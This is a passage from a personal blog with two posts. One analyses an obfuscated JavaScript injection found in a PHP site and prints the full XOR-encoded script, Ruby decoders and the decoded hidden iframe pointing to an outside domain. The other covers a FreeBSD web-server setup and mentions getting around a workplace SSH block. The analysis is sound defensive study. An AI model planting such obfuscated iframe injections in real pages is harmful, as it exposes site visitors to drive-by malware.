:wq - blog » php
http://writequit.org/blog
Tu fui, ego eris

Obfuscated javascript fun
http://writequit.org/blog/2008/03/05/obfuscated-javascript-fun/
Wed, 05 Mar 2008 19:25:07 +0000

A friend of mine (thanks Legit) turned me on to this piece of javascript found in the midst of some PHP:

<script language="JavaScript">
// Each varN holds ten bytes of the payload as \xNN escapes (the backslashes were lost in extraction and are restored here)
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x33\x27\x34\x38\x30"; var4 = "\x26\x21\x34\x21\x7b\x3b\x30\x21\x7a\x3c"; var5 = "\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25\x72"; var6 = "\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72\x64"; var7 = "\x63\x72\x75\x22\x3c\x31\x21\x3d\x68\x72"; var8 = "\x64\x63\x72\x75\x33\x27\x34\x38\x30\x37"; var9 = "\x3a\x27\x31\x30\x27\x68\x72\x65\x72\x75"; var10 = "\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32\x68"; var11 = "\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33\x27"; var12 = "\x34\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
// Decode: XOR every character code with 85 (0x55) and rebuild the string
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
// Drop the decoded markup into the hidden div
document.getElementById("testws35fdgh").innerHTML = dst;
</script>

The getElementById call targets this empty div (id testws35fdgh) elsewhere on the page:

<div id="testws35fdgh"></div>

As it turns out, this is some really terrible obfuscation; here’s the simple script to decode it (written in Ruby because I like Ruby):

#!/usr/bin/env ruby
## The 124 escaped bytes from the varN strings, in order
hex = ["\x69","\x3c","\x33","\x27","\x34","\x38",
"\x30","\x75","\x3b","\x34","\x38","\x30","\x68",
"\x72","\x36","\x3a","\x20","\x3b","\x21","\x30",
"\x27","\x72","\x75","\x26","\x27","\x36","\x68",
"\x72","\x3d","\x21","\x21","\x25","\x6f","\x7a",
"\x7a","\x33","\x27","\x34","\x38","\x30","\x26",
"\x21","\x34","\x21","\x7b","\x3b","\x30","\x21",
"\x7a","\x3c","\x3b","\x31","\x30","\x2d","\x67",
"\x7b","\x25","\x3d","\x25","\x72","\x75","\x3d",
"\x30","\x3c","\x32","\x3d","\x21","\x68","\x72",
"\x64","\x63","\x72","\x75","\x22","\x3c","\x31",
"\x21","\x3d","\x68","\x72","\x64","\x63","\x72",
"\x75","\x33","\x27","\x34","\x38","\x30","\x37",
"\x3a","\x27","\x31","\x30","\x27","\x68","\x72",
"\x65","\x72","\x75","\x26","\x36","\x27","\x3a",
"\x39","\x39","\x3c","\x3b","\x32","\x68","\x72",
"\x3b","\x3a","\x72","\x6b","\x69","\x7a","\x3c",
"\x33","\x27","\x34","\x38","\x30","\x6b"]
line = ""
hex.each { |c|
## Unpack the char into its byte value
## (Array#to_s.to_i only gave the number on Ruby 1.8, so take the first element instead)
c = c.unpack('C').first
## XOR with 85
d = c ^ 85
## Pack back into a character
t = [d].pack('C')
## Append to the line
line = line + t
}
puts line

Which eventually leads you to:

<iframe name='counter' src='http://framestat.net/index2.php' height='16' width='16' frameborder='0' scrolling='no'></iframe>
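The decoder above assumes you already know the key is 85. As an added example (not from the original post), here is how an analyst recovers that key from the script text itself, using the first three varN chunks copied from the snippet above; the extract_bytes, key_from_crib and brute_force names are mine, not the post's.

```ruby
#!/usr/bin/env ruby
# Added example (not from the original post): recover the XOR key of the
# varN scheme above without being told it is 85, then decode the payload.

# The first three "varN" chunks of the obfuscated script, copied verbatim.
SAMPLE = <<~'JS'
  var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34";
  var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30";
  var2 = "\x27\x72\x75\x26\x27\x36\x68\x72\x3d\x21";
JS

# Pull every \xNN escape out of the script text, in source order, giving the
# same byte sequence the browser would have built in `sr`.
def extract_bytes(js)
  js.scan(/\\x([0-9a-fA-F]{2})/).flatten.map { |h| h.to_i(16) }
end

def decode(bytes, key)
  bytes.map { |b| b ^ key }.pack('C*')
end

def printable?(str)
  str.each_byte.all? { |b| b.between?(0x20, 0x7e) }
end

# Method 1, known plaintext: injected markup almost always starts with '<',
# so the key falls out of the very first byte.
def key_from_crib(bytes, crib = '<')
  bytes.first ^ crib.ord
end

# Method 2, brute force: try all 256 single-byte keys, keep the ones that
# give only printable ASCII, and rank by how HTML-like the output looks.
def brute_force(bytes)
  candidates = (0..255).map { |k| [k, decode(bytes, k)] }
  candidates.select { |_, s| printable?(s) }
            .max_by { |_, s| s.count("<>=/'a-z ") }
            .first
end

if __FILE__ == $0
  bytes = extract_bytes(SAMPLE)
  key = key_from_crib(bytes)
  puts "crib key: #{key}, brute-force key: #{brute_force(bytes)}"
  puts decode(bytes, key)   # "<iframe name='counter' src='ht"
end
```

The crib method is enough for this sample; the brute-force ranking is what you fall back on when the payload does not start with a tag.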

If you do a whois on the framestat.net domain, you can see that the domain was suspended:

Registrant:
Suspended Domain ****@4host.info +1.00000000
Suspended domain
Suspended domain
Suspended domain,
Suspended domain,US 94040

Registration Service Provider:
name: Rustelekom Ltd.
tel: +1.8666254678
fax: +1.9782465632
web:http://nameservers.ru

Looks like someone’s been up to something naughty ;) It also looks like it was originally a Russian site (not that it matters). Since the site is down, it’s difficult to tell what would have happened if the iframe source still existed. I’m guessing malware.

Still, the question remains: how did the javascript get onto the page? I’m still looking into that; right now my theory is PHP remote file inclusion, but we’ll see as things become a bit clearer.

An update on the Sun Blade 150
http://writequit.org/blog/2007/10/15/an-update-on-the-sun-blade-150/
Mon, 15 Oct 2007 20:42:48 +0000

Well, I finally got around to finishing all the installs and setup on the Blade 150 I had lying around. In the end, since it only had 1 GB of RAM and a single 600 MHz UltraSPARC II processor, I decided to go with FreeBSD instead of Solaris.

Initially, Solaris worked great serving up a webpage; however, the fact that I did a full install, and the fact that Solaris is not exactly speedy on older hardware, made working with it a little painful. If left unattended, the next time I accessed the machine it would take a few seconds to spin up before allowing a login or serving a webpage. The fact that I left almost all of the daemons running didn’t help. Yea, I know I could have disabled them all; I just like starting clean rather than having to clean up.

Enter FreeBSD. I decided to stay away from Linux as well; short of a Gentoo install (which would be painfully slow, since everything is compiled), FreeBSD is an extremely easy way to get a minimal install with the smallest amount of effort. That, and I enjoy using different things; time to brush up on the BSD knowledge, since it’s been a couple of years since I’ve used it. Anyhow, the machine is now running FreeBSD 6.2-RELEASE with a pretty vanilla install. I set up Lighttpd, MySQL and PHP for a web service so I can teach Delilah PHP one of these days. I also set up ajaxterm so I can access a command line from places where SSH is blocked completely *cough*work*cough* in the event of an emergency.

Overall, I’m liking it more than Solaris; it’s certainly a lot snappier, and it is much easier to get all the things I want using ports than to mess with builds from source on Solaris.

You can check out my extremely weaksauce main page here:

http://navi.eight7.org

Anyone have any suggestions for what else I should use it for? Let me know in the comments!
